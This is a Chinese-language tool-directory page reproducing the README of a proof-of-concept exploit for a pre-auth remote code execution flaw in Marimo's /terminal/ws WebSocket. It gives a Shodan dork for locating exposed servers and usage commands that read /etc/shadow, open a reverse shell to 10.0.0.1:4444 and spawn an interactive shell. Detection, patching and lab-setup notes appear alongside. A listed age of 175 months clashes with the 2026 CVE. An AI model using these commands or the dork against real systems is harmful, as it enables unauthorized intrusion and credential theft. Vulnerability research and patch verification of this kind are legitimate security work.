Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
marimo_CVE-2026-39987_RCE_PoC — CVE-2026-39987 的 PoC:Marimo 0.23.0 之前版本中通过 WebSocket 实现的预认证 RCE(CVSS 9.3)。 | Kitploit
工具/GitHubGitHub/fevar54/marimo_cve-2026-39987_rce_poc
侦察漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubfevar54/marimo_cve-2026-39987_rce_poc

marimo_CVE-2026-39987_RCE_PoC

CVE-2026-39987 的 PoC:Marimo 0.23.0 之前版本中通过 WebSocket 实现的预认证 RCE(CVSS 9.3)。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
175个月前尚未审核

CVE-2026-39987 - Marimo < 0.23.0 预认证 RCE(WebSocket)

⚠️ 法律警告 ⚠️

此脚本仅用于教育目的和授权测试。 未经明确许可,将此工具用于针对系统的未授权使用是违法的。 作者不对滥用此信息的行为承担任何责任。

📋 描述

Marimo 0.23.0 之前的版本存在一个严重的无需预先认证的远程代码执行(RCE)漏洞。/terminal/ws 端点未实施适当的访问控制,允许未认证的攻击者获得系统的完整交互式 shell。

详情信息
CVECVE-2026-39987
严重性严重
CVSS 评分9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H)
类型预认证远程代码执行(RCE)
攻击向量WebSocket(/terminal/ws)
受影响产品Marimo < 0.23.0
补丁Marimo ≥ 0.23.0

🎯 影响

  • ✅ 无需认证即可远程执行命令
  • ✅ 完整的 PTY 交互式 shell
  • ✅ 系统完全沦陷
  • ✅ 访问敏感数据
  • ✅ 可能进行网络横向移动

🔍 识别

Shodan Dork

http.favicon.hash:-1864630356

text

指纹

  • Favicon 哈希:-1864630356
  • 版本端点:/api/version

💀 利用 PoC

要求

root@kitploit:~
pip install websockets requests
基本用法
bash
python CVE-2026-39987_PoC.py http://victima.com:8080 "id"
示例
bash
# 获取系统信息
python CVE-2026-39987_PoC.py http://target.com:8080 "id"
python CVE-2026-39987_PoC.py http://target.com:8080 "uname -a"
python CVE-2026-39987_PoC.py http://target.com:8080 "whoami"

# 读取敏感文件
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/passwd"
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/shadow"

# 反向 shell
python CVE-2026-39987_PoC.py http://target.com:8080 "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

# 交互式 shell
python CVE-2026-39987_PoC.py http://target.com:8080 "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
🛡️ 检测(安全)
被动检测脚本
bash
python detector.py -u http://target.com:8080
python detector.py -l urls.txt
Nuclei 模板
yaml
# marimo-cve-2026-39987.yaml
id: CVE-2026-39987

info:
  name: Marimo < 0.23.0 Pre-Auth RCE
  severity: critical
  # ... (完整模板已包含)
🔧 修复措施
立即执行
将系统从网络中**断开**(如果已暴露)

阻止对 Marimo 运行端口的访问

检查日志中是否有可疑活动

长期措施
bash
# 更新到已修补版本
pip install --upgrade marimo>=0.23.0

# 验证版本
marimo --version

# 如果公开暴露,请配置身份验证
# 切勿将 'marimo edit' 直接暴露到互联网

Docker(易受攻击环境)
bash
# 运行易受攻击版本进行测试
docker run -p 8080:8080 marimo-team/marimo:0.22.0

# 验证漏洞
python CVE-2026-39987_detector.py http://localhost:8080

# 利用
python CVE-2026-39987_PoC.py http://localhost:8080 "id"

GitHub 安全公告

NVD 条目

Pull Request #9098

Marimo 文档

👥 致谢
发现者:[研究人员姓名]

PoC 开发:[您的姓名]

补丁:Marimo 团队

📜 许可证
此项目仅用于教育目的。使用此软件风险自负。

⭐ 如果此 README 对您有帮助,请考虑给该仓库点个星。

⚠️ 请记住:能力越大,责任越大。
下载工具